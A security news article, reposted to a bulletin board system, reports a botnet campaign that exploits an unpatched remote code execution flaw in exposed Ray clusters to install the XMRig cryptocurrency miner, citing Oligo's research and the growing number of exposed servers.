Subj : Ray clusters hijacked and turned into crypto miners by shadowy ne To : All From : TechnologyDaily Date : Wed Nov 19 2025 15:30:08 Ray clusters hijacked and turned into crypto miners by shadowy new botnet Date: Wed, 19 Nov 2025 15:21:00 +0000 Description: IronErn440 is using a known, unfixed flaw, to create a botnet and deploy the XMRig cryptojacker. FULL STORY ======================================================================Ray clusters remain vulnerable to remote code execution via unauthenticated Jobs API Threat group IronErn440 exploits flaw with AI-generated payloads, deploying XMRig cryptojacker Over 230,000 Ray servers are exposed online, up from a few thousand in 2023 Ray clusters, still vulnerable to a critical severity flaw discovered years ago, are being used for cryptocurrency mining, data exfiltration, and even Distributed Denial of Service ( DDoS ) attacks, experts have warned. Cybersecurity researchers Oligo claim this is the second major campaign to leverage this same flaw. Ray is an open source network that helps run Python programs faster by decentralizing and distributing the work across multiple machines. Its clusters are groups of computers - one head node and multiple worker nodes - that work together to run Ray tasks and workloads in a distributed and coordinated way. Official IdentityForce | Identity Theft Protection - save up to 68% annually Many people dont know how to protect their ID. Dont be one of them. Get your ID Action Plan here. Get a personalized step-by-step Action Plan & ID Safety Score based on YOUR dark web hits. View Deal Deploying and hiding XMRig Back in 2023, it was discovered that Ray 2.6.3 and 2.8.0 carried a vulnerability that allowed a remote attacker to execute arbitrary code via the job submission API. However Anyscale, the company behind the product, did not fix it since it is designed to run in a strictly-controlled network environment. In other words - its up to the users to secure their infrastructure and make sure the flaw does not get abused. But abused, it was. First, between September 2023 and March 2024, and today. Oligo says that threat actors tracked as IronErn440 are now using AI-generated payloads to infiltrate vulnerable clusters. By leveraging the bug, the attackers submit jobs to unauthenticated Jobs API, running multi-stage Bash and Python payloads hosted on GitHub and GitLab. These payloads deploy malware to the devices - usually the infamous XMRig cryptojacker. While this cryptojacker is usually easily spotted (since it takes up 100% of the devices processing power and renders it useless for pretty much anything else), the attackers tried to work around this issue by locking it to 60% of processing power. Today, there are more than 230,000 Ray servers exposed to the internet, the researchers warned, saying that their numbers grew significantly compared to just a few thousand that were available when the vulnerability was first discovered. Via BleepingComputer Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button! And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too. ====================================================================== Link to news story: https://www.techradar.com/pro/security/ray-clusters-hijacked-and-turned-into-c rypto-miners-by-shadowy-new-botnet --- Mystic BBS v1.12 A49 (Linux/64) * Origin: tqwNet Technology News (1337:1/100) .